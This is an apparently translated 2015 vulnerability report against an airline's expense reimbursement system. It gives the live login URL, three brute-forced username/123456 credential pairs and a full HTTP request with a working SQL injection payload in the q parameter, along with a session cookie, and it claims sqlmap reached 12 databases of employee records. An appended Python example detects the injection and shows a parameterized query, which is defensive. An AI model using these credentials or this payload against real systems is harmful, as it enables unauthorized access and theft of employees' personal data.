2015-09-07: Details reported to the vendor, awaiting vendor handling
2015-09-08: Vendor has confirmed; details disclosed to the vendor only
2015-09-18: Details disclosed to core white hats and experts in the relevant field
2015-09-28: Details disclosed to regular white hats
2015-10-08: Details disclosed to intern white hats
2015-10-23: Details disclosed to the public
23333333
URL: back-end login page of the expense reimbursement system, http://expense.juneyaoair.com:8080/Frame/login.aspx
Running a dictionary attack turned up three accounts:
zhanghong/123456, zhangjun/123456, liulei/123456. Logging into the system with them,
reimbursement records can be viewed.
The search on the "send message" page has a SQL injection:
POST /publicpage/PubOpenListPage.aspx?ac=getdata&UserSqlPar=&q=%20AND%20text%20LIKE%20%27%27%25123%25%27%27%20%20&key=410402&u=3268 HTTP/1.1
Host: expense.juneyaoair.com:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/plain, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://expense.juneyaoair.com:8080/publicPage/PubOpenListPage.aspx?key=410402&SourceWhere=&IsSingle=0&IsGetStr=1&rand=1441625347394
Content-Length: 45
Cookie: ASP.NET_SessionId=cxycaq55bf3db1550s5awdjk; ERCookie=iUserID=3268&cUserCode=zhanghong&cUserName=%e5%bc%a0%e7%ba%a2&cCredit=0.00&DepartmentName=%e8%88%aa%e6%9d%90%e7%ae%a1%e7%90%86%e5%a4%84&DepartmentID=36&DepartmentCode=010502&CompanyIDList=&CompanyCodeList=&RoleIDList=2%2c266&RoleCodeList=002%2c266&LanguageID=1&s=G3a0FvOSXESM/+tGAwidzZ4KVf3NqYb6&Title=&currentCompId=1&CompanyIDList2=1
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

pageIndex=0&pageSize=10&sortField=&sortOrder=
The q parameter is injectable (the value is concatenated into a text LIKE clause); running sqlmap on it reaches 12 databases.
The current database alone has 400-odd tables.
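As an added defender-side example that is not part of the original report: the Python below decodes the q parameter from the reported request path, flags search terms that carry SQL syntax (a detection a WAF or log review could apply), and shows the parameterized LIKE query the list endpoint should have used so that q is only ever data. The messages table, its columns and the second sample path are constructed assumptions.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed sample request paths: the first is the path from the report,
# the second is an ordinary search term for comparison.
SAMPLE_PATHS = [
    "/publicpage/PubOpenListPage.aspx?ac=getdata&UserSqlPar="
    "&q=%20AND%20text%20LIKE%20%27%27%25123%25%27%27%20%20&key=410402&u=3268",
    "/publicpage/PubOpenListPage.aspx?ac=getdata&UserSqlPar=&q=travel&key=410402&u=3268",
]

# A free-text search term has no business containing quotes, semicolons or
# SQL keywords; keyword-only hits are noisy and need tuning per application.
SQL_TOKENS = re.compile(r"(?i)\b(and|or|union|select|like|exec)\b|['\";]")


def extract_q(path):
    """Return the URL-decoded value of the q parameter ('' if absent)."""
    params = parse_qs(urlsplit(path).query, keep_blank_values=True)
    return params.get("q", [""])[0]


def looks_like_injection(q):
    """Heuristic detector for SQL syntax inside the q search term."""
    return SQL_TOKENS.search(q) is not None


def flagged_paths(paths):
    """Run the detector over request paths and return the ones to review."""
    return [p for p in paths if looks_like_injection(extract_q(p))]


def build_demo_db():
    """Constructed in-memory stand-in for the message list's backing table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE messages (id INTEGER, text TEXT)")
    conn.executemany("INSERT INTO messages VALUES (?, ?)", [
        (1, "reimbursement 123 approved"),
        (2, "travel claim pending"),
        (3, "note: AND text"),
    ])
    return conn


def safe_search(conn, q):
    """Hardened form: bound parameter plus wildcard escaping, so q can only
    match literally and cannot alter the WHERE clause."""
    escaped = q.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    cur = conn.execute(
        "SELECT id FROM messages WHERE text LIKE ? ESCAPE '\\' ORDER BY id",
        ("%" + escaped + "%",))
    return [row[0] for row in cur.fetchall()]
```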
The records of 8000-odd employees, account passwords included, should all be in there; I won't prove it.
With this much data, I did not dump the database. Asking for 20 rank!!!
Severity: High
Vulnerability Rank: 16
Confirmed: 2015-09-08 15:43
Vulnerability confirmed
Vendor response: none yet